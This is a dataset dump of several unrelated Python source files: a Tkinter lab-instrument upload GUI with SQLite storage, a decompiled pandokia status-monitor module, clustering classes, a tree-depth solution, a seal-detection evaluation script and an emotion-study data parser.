connection error'\n\n # write clicked create connection\n # and gets test results where the upload state is \"n\"\n # which means not uploaded\n def attemptUpload(self):\n samples = self.dbc('select * from test where uploadstate = \"n\" order by created_at desc')\n # for i in samples:\n # print(i)\n # print('\\n')\n if len(samples)==0:\n return\n for sample in samples:\n parms = self.getSampleParameters(sample[1])\n\n # this condition check is the test code it within the parms brought from the api LIMS\n # for the given barcode\n # note that test[1] is the barcode it self\n if parms:\n # print(sample[2])\n string = sample[2][1:-1].split(',')\n # print(string)\n testlist = []\n for test in string:\n test = test.split(':')\n # print(test)\n testlist.append({test[0].strip()[1:-1]: test[1].strip()[1:-1]})\n # print(testlist)\n samplelist = []\n samplelist.append(sample[0])\n samplelist.append(sample[1])\n samplelist.append(testlist)\n # print(samplelist)\n self.upload(samplelist)\n else:\n self.testseterror(sample[0])\n\n # upload the last test result and\n # try to upload unuploaded tests\n def writer(self, result):\n print('Writer: result,', result)\n self.testset(result)\n self.attemptUpload()\n\n # craete a connection\n def dbc(self, d=''):\n # print(d)\n os.chdir(self.path + self.instrumentName)\n # print('dbc',os.getcwd())\n if d:\n with sqlite3.connect('median.db') as cnxn:\n # print('first with')\n c = cnxn.cursor()\n x = list(c.execute(d))\n c.close()\n return x\n\n\n def run(self):\n self.connect_button.configure(state='disabled')\n self.show('connecting')\n # prepare connection\n # check if the conenction valid\n # enable disconnect button\n # call the amin loop\n\n # turns off the connect button and start the run function\n # this function only works if the connection button is active\n def connect(self, p1):\n # print('starting one')\n if self.connect_button.state()[0] == 'active':\n self.show('starting')\n self.run()\n\n # show used to # print strings on the connection state scrolled text box\n def show(self, string):\n self.connection_state_text.configure(state='normal')\n self.connection_state_text.insert(tk.END, '\\n'+string)\n self.connection_state_text.configure(state='disabled')\n \n # gets the right ip\n def getIP(self):\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n self.ip = s.getsockname()[0]\n s.close()\n\n # exit2 is basically a program close button it check is the exit button is working and then\n # it calls the disconnect and the root.destroy functions\n # and finally close the program with sys.close\n def exit2(self, p1):\n if self.exit_btn.state()[0] == 'active':\n self.disconnect()\n self.root.destroy()\n sys.exit()\n\n # the initialization function\n def __init__(self):\n self.root = tk.Tk()\n '''This class configures and populates the toplevel window.\n top is the toplevel containing window.'''\n _bgcolor = '#d9d9d9' # X11 color: 'gray85'\n _fgcolor = '#000000' # X11 color: 'black'\n _compcolor = '#d9d9d9' # X11 color: 'gray85'\n _ana1color = '#d9d9d9' # X11 color: 'gray85'\n _ana2color = '#ececec' # Closest X11 color: 'gray92'\n self.style = ttk.Style()\n if sys.platform == \"win32\":\n self.style.theme_use('winnative')\n self.style.configure('.', background=_bgcolor)\n self.style.configure('.', foreground=_fgcolor)\n self.style.configure('.', font=\"TkDefaultFont\")\n self.style.map('.', background=\n [('selected', _compcolor), ('active', _ana2color)])\n\n self.root.geometry(\"595x600+422+80\")\n self.root.title(self.instrumentName)\n self.root.configure(background=\"#d9d9d9\")\n self.root.configure(highlightbackground=\"#d9d9d9\")\n self.root.configure(highlightcolor=\"black\")\n\n self.connection_parameter_frame = ttk.Labelframe(self.root)\n self.connection_parameter_frame.place(relx=0.017, rely=0.02\n , relheight=0.274, relwidth=0.941)\n self.connection_parameter_frame.configure(relief='')\n self.connection_parameter_frame.configure(text='''connection_parameter''')\n self.connection_parameter_frame.configure(width=560)\n\n self.port_description_frame = ttk.Labelframe(self.connection_parameter_frame)\n self.port_description_frame.place(relx=0.018, rely=0.519, relheight=0.333\n , relwidth=0.714, bordermode='ignore')\n self.port_description_frame.configure(relief='')\n self.port_description_frame.configure(text='''network_parameters''')\n self.port_description_frame.configure(width=400)\n\n self.port_entry = ttk.Entry(self.port_description_frame)\n self.port_entry.place(relx=0.025, rely=0.444, relheight=0.467, relwidth=0.33, bordermode='ignore')\n self.port_entry.configure(takefocus=\"\")\n self.port_entry.configure(cursor=\"ibeam\")\n\n self.ip_entry = ttk.Entry(self.port_description_frame)\n self.ip_entry.place(relx=0.37, rely=0.444, relheight=0.467, relwidth=0.596, bordermode='ignore')\n self.ip_entry.configure(takefocus=\"\")\n self.ip_entry.configure(cursor=\"ibeam\")\n\n self.connect_button = ttk.Button(self.connection_parameter_frame)\n self.connect_button.place(relx=0.804, rely=0.34, height=25, width=76\n , bordermode='ignore')\n self.connect_button.configure(text='''connect''')\n self.connect_button.configure(command=lambda e='': self.connect(e))\n\n self.disconnect_button = ttk.Button(self.connection_parameter_frame)\n self.disconnect_button.place(relx=0.804, rely=0.54, height=25, width=76\n , bordermode='ignore')\n self.disconnect_button.configure(takefocus=\"\")\n self.disconnect_button.configure(text='''disconnect''')\n self.disconnect_button.configure(state='disable')\n self.disconnect_button.configure(command=lambda e='': self.exit1(e))\n\n self.exit_btn = ttk.Button(self.connection_parameter_frame)\n self.exit_btn.place(relx=0.804, rely=0.74, height=25, width=76\n , bordermode='ignore')\n self.exit_btn.configure(takefocus=\"\")\n self.exit_btn.configure(text='''exit''')\n self.exit_btn.configure(command=lambda e='': self.exit2(e))\n\n self.connection_state = ttk.Labelframe(self.root)\n self.connection_state.place(relx=0.017, rely=0.304, relheight=0.68\n , relwidth=0.941)\n self.connection_state.configure(relief='')\n self.connection_state.configure(text='''connection_state''')\n self.connection_state.configure(width=560)\n\n self.connection_state_text = ScrolledText(self.connection_state)\n self.connection_state_text.place(relx=0.018, rely=0.06, relheight=0.928\n , relwidth=0.966, bordermode='ignore')\n self.connection_state_text.configure(background=\"white\")\n self.connection_state_text.configure(state='disabled')\n self.connection_state_text.configure(font=\"TkTextFont\")\n self.connection_state_text.configure(foreground=\"black\")\n self.connection_state_text.configure(highlightbackground=\"#d9d9d9\")\n self.connection_state_text.configure(highlightcolor=\"black\")\n self.connection_state_text.configure(insertbackground=\"black\")\n self.connection_state_text.configure(insertborderwidth=\"3\")\n self.connection_state_text.configure(selectbackground=\"#c4c4c4\")\n self.connection_state_text.configure(selectforeground=\"black\")\n self.connection_state_text.configure(width=254)\n self.connection_state_text.configure(wrap=\"none\")\n\n '''the following two statements used to initiate the port entry and file path entry'''\n self.getIP()\n self.ip_entry.insert(0, self.ip)\n self.port_entry.insert(0, self.port)\n self.path=str(os.path.expanduser('~/'))\n os.chdir(self.path)\n try:\n os.mkdir(self.instrumentName)\n except FileExistsError:\n pass\n os.chdir(self.path + self.instrumentName)\n print(os.getcwd())\n\n self.dbc()\n try:\n self.dbc('''\n CREATE TABLE sample(\n barcode unsigned int primary key,\n created_at datetime not null default current_timestamp\n )\n ''')\n except sqlite3.OperationalError as e:\n # print('already exists')\n if str(e)[-6:] == 'exists':\n pass\n else:\n raise sqlite3.OperationalError\n\n\n try:\n self.dbc('''\n CREATE TABLE counter(\n id unsigned int primary key not null default 1,\n count unsigned int not null default 1\n )\n ''')\n self.dbc('insert into counter(id,count) values(1,1);')\n except sqlite3.OperationalError as e:\n # print('already exists')\n if str(e)[-6:] == 'exists':\n pass\n else:\n raise sqlite3.OperationalError\n\n\n\n try:\n self.dbc('''\n CREATE TABLE test(\n test_id unsigned int primary key not null,\n barcodeid varchar(30) not null,\n results varchar(20000) not null,\n uploadstate varchar(1) default 'n',\n created_at datetime not null default current_timestamp,\n FOREIGN KEY(barcodeid) REFERENCES user(barcode)\n );\n ''')\n except sqlite3.OperationalError as e:\n # print('already exists')\n if str(e)[-6:] == 'exists':\n pass\n else:\n raise sqlite3.OperationalError\n\n\n# The following code is added to facilitate the Scrolled widgets you specified.\nclass AutoScroll(object):\n '''Configure the scrollbars for a widget.'''\n\n def __init__(self, master):\n # Rozen. Added the try-except clauses so that this class\n # could be used for scrolled entry widget for which vertical\n # scrolling is not supported. 5/7/14.\n try:\n vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)\n except:\n pass\n hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)\n\n #self.configure(yscrollcommand=_autoscroll(vsb),\n # xscrollcommand=_autoscroll(hsb))\n try:\n self.configure(yscrollcommand=self._autoscroll(vsb))\n except:\n pass\n self.configure(xscrollcommand=self._autoscroll(hsb))\n\n self.grid(column=0, row=0, sticky='nsew')\n try:\n vsb.grid(column=1, row=0, sticky='ns')\n except:\n pass\n hsb.grid(column=0, row=1, sticky='ew')\n\n master.grid_columnconfigure(0, weight=1)\n master.grid_rowconfigure(0, weight=1)\n\n # Copy geometry methods of master (taken from ScrolledText.py)\n if py3:\n methods = tk.Pack.__dict__.keys() | tk.Grid.__dict__.keys() \\\n | tk.Place.__dict__.keys()\n else:\n methods = tk.Pack.__dict__.keys() + tk.Grid.__dict__.keys() \\\n + tk.Place.__dict__.keys()\n\n for meth in methods:\n if meth[0] != '_' and meth not in ('config', 'configure'):\n setattr(self, meth, getattr(master, meth))\n\n @staticmethod\n def _autoscroll(sbar):\n '''Hide and show scrollbar as needed.'''\n def wrapped(first, last):\n first, last = float(first), float(last)\n if first <= 0 and last >= 1:\n sbar.grid_remove()\n else:\n sbar.grid()\n sbar.set(first, last)\n return wrapped\n\n def __str__(self):\n return str(self.master)\n\n\ndef _create_container(func):\n '''Creates a ttk Frame with a given master, and use this new frame to\n place the scrollbars and the widget.'''\n def wrapped(cls, master, **kw):\n container = ttk.Frame(master)\n container.bind('', lambda e: _bound_to_mousewheel(e, container))\n container.bind('', lambda e: _unbound_to_mousewheel(e, container))\n return func(cls, container, **kw)\n return wrapped\n\n\nclass ScrolledText(AutoScroll, tk.Text):\n '''A standard Tkinter Text widget with scrollbars that will\n automatically show/hide as needed.'''\n @_create_container\n def __init__(self, master, **kw):\n tk.Text.__init__(self, master, **kw)\n AutoScroll.__init__(self, master)\n\n\ndef _bound_to_mousewheel(event, widget):\n child = widget.winfo_children()[0]\n if platform.system() == 'Windows' or platform.system() == 'Darwin':\n child.bind_all('', lambda e: _on_mousewheel(e, child))\n child.bind_all('', lambda e: _on_shiftmouse(e, child))\n else:\n child.bind_all('', lambda e: _on_mousewheel(e, child))\n child.bind_all('', lambda e: _on_mousewheel(e, child))\n child.bind_all('', lambda e: _on_shiftmouse(e, child))\n child.bind_all('', lambda e: _on_shiftmouse(e, child))\n\n\ndef _unbound_to_mousewheel(event, widget):\n if platform.system() == 'Windows' or platform.system() == 'Darwin':\n widget.unbind_all('')\n widget.unbind_all('')\n else:\n widget.unbind_all('')\n widget.unbind_all('')\n widget.unbind_all('')\n widget.unbind_all('')\n\n\ndef _on_mousewheel(event, widget):\n if platform.system() == 'Windows':\n widget.yview_scroll(-1*int(event.delta/120),'units')\n elif platform.system() == 'Darwin':\n widget.yview_scroll(-1*int(event.delta),'units')\n else:\n if event.num == 4:\n widget.yview_scroll(-1, 'units')\n elif event.num == 5:\n widget.yview_scroll(1, 'units')\n\n\ndef _on_shiftmouse(event, widget):\n if platform.system() == 'Windows':\n widget.xview_scroll(-1*int(event.delta/120), 'units')\n elif platform.system() == 'Darwin':\n widget.xview_scroll(-1*int(event.delta), 'units')\n else:\n if event.num == 4:\n widget.xview_scroll(-1, 'units')\n elif event.num == 5:\n widget.xview_scroll(1, 'units')\n\n#\ninstance = Toplevel1()\ninstance.root.mainloop()\n\n","sub_path":"Layouts/Network/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":18729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"175246627","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jhunk/Downloads/pandokia/pandokia/run_status.py\n# Compiled at: 2018-05-14 14:25:23\n# Size of source mod 2**32: 12650 bytes\nimport ast, datetime, mmap, os, platform, sys, time\nmem = None\ntest_mode = None\nif test_mode:\n saw_locked = 0\n saw_changed = 0\nif platform.system() == 'Windows':\n\n def init_status(*l, **kw):\n pass\n\n\n def pdkrun_status(*l, **kw):\n pass\n\n\n def display(*l, **kw):\n pass\n\n\n def display_interactive(*l, **kw):\n pass\n\n\nelse:\n\n def init_status(filename=None, n_records=10, status_text_size=2000):\n \"\"\"Create a status file with n_records blank records in it\n \"\"\"\n valid_flag_size = 1\n if filename is None:\n filename = os.getcwd() + '/pdk_statusfile'\n try:\n os.unlink(filename)\n except:\n pass\n\n with open(filename, 'w') as (fp):\n\n def gen_header():\n s = '********PDKRUN status monitor 000\\n%08d %d %d %d\\n' % (\n header_size, status_text_size, n_records, valid_flag_size)\n return s\n\n header_size = 0\n header = gen_header()\n header_size = len(header)\n header = gen_header()\n assert header_size == len(header)\n fp.write(('%08x' % int(time.time()))[0:8])\n fp.write(header[8:])\n for x in range(n_records):\n fp.write(' ' * (valid_flag_size + status_text_size))\n fp.write('\\n')\n\n return filename\n\n\n class status_block(object):\n\n def __init__(self, filename, mode):\n if mode == 'w':\n mode = 'r+b'\n prot = mmap.PROT_READ | mmap.PROT_WRITE\n else:\n mode = 'rb'\n prot = mmap.PROT_READ\n with open(filename, mode) as (fp):\n for lineno, record in enumerate(fp):\n record = record.decode()\n if lineno == 0:\n if record[8:] != 'PDKRUN status monitor 000\\n':\n raise Exception('Not a PDKRUN status monitor file: %s' % filename)\n else:\n if lineno == 1:\n header = record.strip().split(' ')\n\n self._fd = os.dup(fp.fileno())\n self.header_size = int(header[0])\n self.status_text_size = int(header[1])\n self.n_records = int(header[2])\n self.valid_flag_size = int(header[3])\n self.record_size = self.valid_flag_size + self.status_text_size + 1\n self.status_text_offset = self.valid_flag_size\n self.locked_valid_flag = 'X' * self.valid_flag_size\n self.file_size = self.record_size * self.n_records + self.header_size\n self.mem = mmap.mmap(fileno=(self._fd),\n length=(self.file_size),\n flags=(mmap.MAP_SHARED),\n prot=prot)\n self.header_timestamp = self.mem[0:8]\n\n def header_changed(self):\n return self.mem[0:8] != self.header_timestamp\n\n def get_status_text(self, n):\n return self.get_value_at_offset(n, self.status_text_offset, self.status_text_size)\n\n def get_value_at_offset(self, n, offset, len):\n global saw_changed\n global saw_locked\n start = self.header_size + n * self.record_size\n flag = self.mem[start:start + self.valid_flag_size]\n if flag == self.locked_valid_flag:\n if test_mode:\n if test_mode == 'L':\n saw_locked += 1\n return 'locked'\n return\n else:\n s = self.mem[start + offset:start + offset + len]\n if flag != self.mem[start:start + self.valid_flag_size]:\n if test_mode and test_mode == 'C':\n saw_changed += 1\n return 'changed'\n else:\n return\n return s\n\n def set_my_record(self, n):\n if n >= self.n_records:\n raise Exception('only %d records in file - using #%d\\n' % (\n self.n_records, n))\n self.my_record = n\n self.my_record_offset = self.header_size + n * self.record_size\n\n def set_status_text(self, value):\n return self.set_value_at_offset(self.status_text_offset, self.status_text_size, value)\n\n def set_value_at_offset(self, offset, blocklen, value):\n start = self.my_record_offset\n old_valid_flag = self.mem[start:start + self.valid_flag_size]\n try:\n self.mem[start:start + self.valid_flag_size] = self.locked_valid_flag\n except TypeError:\n self.mem[start:start + self.valid_flag_size] = bytes(self.locked_valid_flag, 'ascii')\n\n if len(value) < blocklen:\n value = value + ' ' * (blocklen - len(value) + 1)\n value = value[0:blocklen]\n try:\n s = self.mem[start + offset:start + offset + blocklen] = value\n except TypeError:\n s = self.mem[start + offset:start + offset + blocklen] = bytes(value, 'ascii')\n\n try:\n n = int(old_valid_flag) + 1 & 7\n except:\n n = 0\n\n try:\n self.mem[start:start + self.valid_flag_size] = '%*d' % (self.valid_flag_size, n)\n except TypeError:\n self.mem[start:start + self.valid_flag_size] = bytes('%*d' % (\n self.valid_flag_size,\n n), 'ascii')\n\n\n if __name__ == '__main__':\n s = sys.stdin.readline().strip()\n if s == 'i':\n init_status('pdk_statusfile', 10)\n s = 'w'\n if s == 's':\n m = status_block('pdk_statusfile')\n m.set_my_record(1)\n for x in range(0, 10000000):\n m.set_status_text('%d' % x)\n\n else:\n m = status_block('pdk_statusfile')\n m.set_my_record(int(s))\n while 1:\n print('>')\n l = sys.stdin.readline().strip()\n if l[0] in '0123456789':\n n = int(l.split()[0])\n m.set_my_record(n)\n else:\n if l[0] == 's':\n m.set_status_text(l[1:])\n else:\n print('?')\n\n def pdkrun_status(text, slot=None):\n \"\"\"A status setting function for use within pdkrun\n\n You call pdkrun_status( text ) to set your status\n\n slot is the slot number to note the status in (default is PDK_PROCESS_SLOT environment)\n \"\"\"\n global mem\n if 'PDK_STATUSFILE' not in os.environ:\n return\n else:\n if os.environ['PDK_STATUSFILE'] == 'none':\n return\n if slot is None:\n if 'PDK_PROCESS_SLOT' in os.environ:\n slot = int(os.environ['PDK_PROCESS_SLOT'])\n else:\n slot = 0\n if mem is None:\n mem = status_block(os.environ['PDK_STATUSFILE'], 'w')\n mem.set_my_record(slot)\n mem.set_status_text(repr(text) + ',%d' % time.time())\n\n\n def display(visual, waiting_for_start):\n filename = 'pdk_statusfile'\n done_waiting = not waiting_for_start\n if waiting_for_start:\n while not os.path.exists(filename):\n time.sleep(1)\n\n m = status_block(filename, 'r')\n times = {}\n while True:\n if visual:\n sys.stdout.write('\\x1b[H\\x1b[J')\n elif m.header_changed():\n m = status_block(filename, 'r')\n done_waiting = not waiting_for_start\n else:\n any = 0\n for x in range(0, m.n_records):\n s = m.get_status_text(x)\n if s is None:\n sys.stdout.write('-')\n else:\n try:\n text, tyme = ast.literal_eval(s)\n except SyntaxError:\n text = str(s).strip()\n tyme = 'None'\n else:\n if tyme not in times:\n times = {}\n times[tyme] = str(datetime.datetime.fromtimestamp(tyme))\n tyme = times[tyme]\n text = str(text).strip()\n if text != '':\n any = 1\n done_waiting = 1\n sys.stdout.write('%2d %s %s' % (x, tyme, text))\n if visual:\n sys.stdout.write('\\x1b[K')\n sys.stdout.write('\\n')\n\n if test_mode:\n sys.stdout.write('%d %d %d\\n' % (\n time.time(), saw_locked, saw_changed))\n if not visual:\n break\n if not any:\n if done_waiting:\n break\n time.sleep(1)\n\n\n def display_interactive(args):\n display(1, 1)","sub_path":"pycfiles/pandokia-2.3.0.tar/run_status.cpython-36.py","file_name":"run_status.cpython-36.py","file_ext":"py","file_size_in_byte":9561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"311451740","text":"\nclass CCluster:\n\n def __init__(self, r):\n \n self.__t = []\n self.__r = r\n self.__S = 0\n self.__W = 0\n self.__A = None\n self.__ln = None\n self.__elems = [ {} for _ in range(22) ]\n\n def __len__(self):\n \n if self.__ln == None:\n \n self.__ln = len(self.__t)\n\n return self.__ln\n\n def __iter__(self):\n\n for t in self.__t:\n\n yield t\n\n def A(self):\n\n if self.__A == None:\n\n g = float(self.__S) / (self.__W ** self.__r) if self.__W else 0\n self.__A = g * len(self)\n\n return self.__A\n\n def append(self, t):\n \n if t not in self.__t:\n\n self.__t.append(t)\n self.__A = None\n self.__ln = None\n self.__S += t.D\n\n for (elem, ind) in t:\n\n if elem in self.__elems[ind]: self.__elems[ind][elem] += 1\n else: self.__elems[ind][elem] = 1\n\n if self.__elems[ind][elem] == 1: self.__W += 1\n\n def delete(self, t):\n \n if t in self.__t:\n\n del(self.__t[self.__t.index(t)])\n self.__A = None\n self.__ln = None\n self.__S -= t.D\n\n for (elem, ind) in t:\n\n self.__elems[ind][elem] -= 1\n if self.__elems[ind][elem] == 0: self.__W -= 1\n\n def __str__(self):\n\n ln = len(self)\n p = 0\n\n for t in self.__t:\n\n if t.cls() == \"p\":\n \n p += 1\n\n return \"%u transactions, %u p, %u e\" % ( ln, p, ln - p )\n\nclass CClusterSet:\n\n __len__ = lambda self: len(self.__clusters)\n __getitem__ = lambda self, ind: self.__clusters[ind]\n\n def __init__(self, r, cluster_num):\n\n self.__clusters = [ CCluster(r) for _ in range(cluster_num) ]\n\n def __iter__(self):\n\n for c in self.__clusters:\n\n yield c\n\n def delete(self, c_ind):\n\n del(self.__clusters[c_ind])\n\n def profit(self):\n\n A = 0\n B = 0\n\n for c in self.__clusters:\n\n A += c.A()\n B += len(c)\n\n return float(A) / B\n\n def profit_with_temporary_append(self, c_ind, t):\n\n self.__clusters[c_ind].append(t)\n profit = self.profit()\n self.__clusters[c_ind].delete(t)\n\n return profit\n\n","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"186895921","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\nclass Solution:\n def maxDepth(self, root: 'Node') -> int:\n if root is None: return 0\n max_depth = 1\n def search(node, depth):\n if node is None: return\n nonlocal max_depth\n if depth > max_depth: max_depth = depth\n for child in node.children:\n search(child, depth+1)\n return\n\n search(root, 1)\n return max_depth\n","sub_path":"LeetCode/Easy/559MaximumDepthofN-aryTree-2.py","file_name":"559MaximumDepthofN-aryTree-2.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"212556469","text":"import os\nimport pandas as pd\n\nfrom metrics.BoundingBox import *\nfrom metrics.BoundingBoxes import BoundingBoxes\nfrom metrics.Evaluator import Evaluator\nfrom metrics.utils import CoordinatesType\n\nimport argparse\n# An example detection results file can be found at\n# https://drive.google.com/file/d/18PzWcAUwu9kdagB1Cz4XmH5r6kJdvx2p/view?usp=sharing\n# which can be evaluated against data/updated_seals.csv in this repo\nparser = argparse.ArgumentParser(description='Evaluate RGB Detectors.')\nparser.add_argument('--gts', help='Ground Truth CSV Path', required=True)\nparser.add_argument('--dets', help='Viame Detections CSV Path', required=True)\nparser.add_argument('--nms', default=.5, help='nms threshold', type=float)\nparser.add_argument('--iou', default=.5, help='iou threshold', type=float)\nparser.add_argument('--conf', default=0.0, help='minimum confidence threshold', type=float)\nparser.add_argument('--detectiononly', dest='detectiononly', action='store_true', help='minimum confidence threshold')\nparser.add_argument('--updated_csv', dest='updated_csv', action='store_true', help='for Yuvals updated csv only')\n\nargs = parser.parse_args()\n\nDETECTIONS_CSV = args.dets\nGROUND_TRUTH_CSV = args.gts\nNMS_THRESH = args.nms\nIOUThreshold = args.iou\nCONFIDENCE_THRESH = args.conf\nDETECTION_ONLY = args.detectiononly\nYUVALS_CSV = args.updated_csv\n\n\n# READ DATA FROM BOTH FILES INTO PANDAS\nground_truth_data = pd.read_csv(GROUND_TRUTH_CSV, dtype={'hotspot_id': object})\n\nx1_col, x2_col, y1_col, y2_col = \"color_left\",\"color_right\",\"color_top\",\"color_bottom\" # Use for original NOAA format\nnumeric_cols = [\"thermal_x\", \"thermal_y\", \"color_left\", \"color_top\",\n \"color_right\", \"color_bottom\"]\n\n# My updated labels file has different headers for box label bounds\nif YUVALS_CSV:\n x1_col, x2_col, y1_col, y2_col = \"updated_left\", \"updated_right\", \"updated_top\", \"updated_bottom\" # Use for files w/my udpated labels\n\n numeric_cols = [\"thermal_x\", \"thermal_y\", \"color_left\", \"color_top\",\n \"color_right\", \"color_bottom\", \"updated_left\",\n \"updated_top\", \"updated_right\", \"updated_bottom\"]\n\nground_truth_data[numeric_cols] = \\\n ground_truth_data[numeric_cols].apply(pd.to_numeric)\n\nbounding_boxes= BoundingBoxes()\n#\n# Read the output csv file from VIAME and create BoundingBox objects using\n# the label with highest confidence for each box. Then do the same with the\n# ground truth csv file\n#\nwith open(DETECTIONS_CSV) as f:\n rows = [line.split(',') for line in f] # create a list of lists\n rows = rows[2:]\n for row in rows:\n det_id, img_name, frame_id, x1, y1, x2, y2, conf, _ = row[:9]\n\n det_id = int(det_id)\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n conf = float(conf)\n label = \"ERR\"\n multilabels = row[9:]\n for i in range(0, len(multilabels), 2): # use label with highest confidence\n label_conf = float(multilabels[i + 1])\n if label_conf == conf:\n label = multilabels[i]\n if \"ringed\" in label:\n label = \"Ringed Seal\"\n if \"bearded\" in label:\n label = \"Bearded Seal\"\n if \"unk\" in label:\n label = \"UNK Seal\"\n if DETECTION_ONLY:\n label = \"Seal\"\n bbox = BoundingBox(imageName=img_name, classId=label,\n x=x1, y=y1, w=x2, h=y2, typeCoordinates=CoordinatesType.Absolute,\n bbType=BBType.Detected, classConfidence=conf, format=BBFormat.XYX2Y2\n )\n\n bounding_boxes.addBoundingBox(bbox)\nbounding_boxes=bounding_boxes.nms(NMS_THRESH, CONFIDENCE_THRESH) # NMS Step\nfor index, row in ground_truth_data.iterrows():\n hsId = row[\"hotspot_id\"]\n x1 = row[x1_col]\n x2 = row[x2_col]\n y1 = row[y1_col]\n y2 = row[y2_col]\n label = row['species_id']\n img_name = row['color_image']\n if DETECTION_ONLY:\n label = \"Seal\"\n bbox = BoundingBox(imageName=img_name, classId=label,\n x=x1, y=y1, w=x2, h=y2, typeCoordinates=CoordinatesType.Absolute,\n bbType=BBType.GroundTruth, format=BBFormat.XYX2Y2, hsId=hsId\n )\n\n bounding_boxes.addBoundingBox(bbox)\n\n\nevaluator = Evaluator()\nmetrics = evaluator.GetPascalVOCMetrics(bounding_boxes, IOUThreshold=IOUThreshold,\n CONFIDENCE_THRESH=CONFIDENCE_THRESH)\nprint(\"Ground truth file: %s\" % GROUND_TRUTH_CSV)\nprint(\"VIAME detections file: %s\" % DETECTIONS_CSV)\nprint(\"NMS %.3f - IOU %.3f - CONFIDENCE %.3f\" % (NMS_THRESH, IOUThreshold, CONFIDENCE_THRESH))\nprint(\"\\n\\n\")\n\nall_tps = []\nall_fps = []\nall_fns = []\nfor class_met in metrics:\n all_tps += class_met['TP_items']\n all_fps += class_met['FP_items']\n all_fns += class_met['FN_items']\n label = class_met['class']\n print(\"%s:\"%label)\n tps = class_met[\"total TP\"]\n fps = class_met[\"total FP\"]\n fns = class_met[\"total FN\"]\n if tps ==0 and fps == 0:\n print(\"No detections for class %s\" % label)\n continue\n precision = tps/(tps+fps)\n recall = tps / (tps+fns)\n print(\"TP %d - FP %d - FN %d\" % (int(tps),int(fps),int(fns)))\n print(\"Precision: %f\" % precision)\n print(\"Recall: %f\" % recall)\n print(\"\")\n\ntps_df = pd.DataFrame(all_tps)\nfps_df = pd.DataFrame(all_fps)\n\ntps_df = tps_df.sort_values('image')\nfps_df = fps_df.sort_values('image')\ntps_df = tps_df.reset_index(drop=True)\nfps_df = fps_df.reset_index(drop=True)\ntps_df = tps_df[['image','label','confidence','left','bottom','right','top','groundtruth_hs_id']]\nfps_df = fps_df[['image','label','confidence','left','bottom','right','top']]\ntps_df.to_csv(\"tps.csv\")\nfps_df.to_csv(\"fps.csv\")\n\n\n# False negatives gets saved as original ground truth csv format with only hotspots that are fns\nfns_df = ground_truth_data.loc[ground_truth_data['hotspot_id'].isin(all_fns)]\nfns_df.to_csv(\"fns.csv\")","sub_path":"scripts/evaluate_viame_rgb_detections.py","file_name":"evaluate_viame_rgb_detections.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"521749892","text":"from statistics import mean, stdev\r\nfrom scipy.stats import ttest_ind\r\nfrom pickle import dump\r\nimport os\r\nimport re\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom operator import itemgetter\r\nimport csv\r\n\r\nVIDEO_DIR = 'data\\\\VideoFiles\\\\'\r\nVIDEO_BL_DIR = 'data\\\\VideoBaselineFiles\\\\'\r\n\r\n\r\nDATA_DIR = 'data\\\\'\r\nDICT_FILE = 'data_dict'\r\nINVALID_LIST = [999,37,43]\r\n\r\n\r\ndef createParticipants():\r\n emotions = {\r\n 0: \"happy\",\r\n 1: \"sad\",\r\n 2: \"neutral\"\r\n }\r\n details = {}\r\n participants = {}\r\n with open(DATA_DIR + 'Participant.csv') as participantFile:\r\n for line in participantFile.readlines():\r\n details = {}\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == '0'):\r\n continue\r\n if (l[0] == 'NULL'):\r\n return participants\r\n #read details from participant data table\r\n identification = int(l[0][-3:])\r\n details['emotion'] = (emotions.get(int(l[2])), int(l[2]))\r\n details['videoBaseline'] = l[3]\r\n details['videoBaselineLabeled'] = l[4]\r\n details['videoBaselineData'] = l[5]\r\n details['video'] = l[6]\r\n details['videoLabeled'] = l[7]\r\n details['videoData'] = l[8]\r\n details['audioBaseline'] = l[9]\r\n details['audioBaselineData'] = l[10]\r\n details['audio'] = l[11]\r\n details['audioData'] = l[12]\r\n details['writingTime'] = float(l[13])\r\n details['ultimatumOffer'] = float(l[14])\r\n details['ultimatumOfferPercent'] = float(l[15])\r\n details['ultimatumInstructionRT'] = float(l[16])\r\n details['ultimatumDMrt'] = float(l[17])\r\n details['trustOffer'] = float(l[18])\r\n details['trustOfferPercent'] = float(l[19])\r\n details['trustInstructionRT'] = float(l[20])\r\n details['trustDMrt'] = float(l[21])\r\n selfReport = {}\r\n videoBLFreq = {}\r\n videoFreq = {}\r\n audioBL = {}\r\n audio = {}\r\n details['selfReport'] = selfReport\r\n details['videoBLFreq'] = videoBLFreq\r\n details['videoFreq'] = videoFreq\r\n details['audioBL'] = audioBL\r\n details['audio'] = audio\r\n participants[identification] = details\r\n\r\n return participants\r\n\r\n\r\ndef getSelfReportData(participantDict):\r\n #get info from self-report data table\r\n emotions = {\r\n 1: \"apathy\",\r\n 2: \"sadness\",\r\n 3: \"calm\",\r\n 4: \"amusement\",\r\n 5: \"grief\",\r\n 6: \"happiness\"\r\n }\r\n emotion = 1\r\n with open(DATA_DIR + 'SelfReport.csv') as selfReportFile:\r\n for line in selfReportFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n return\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['selfReport'][emotions.get(emotion)] = 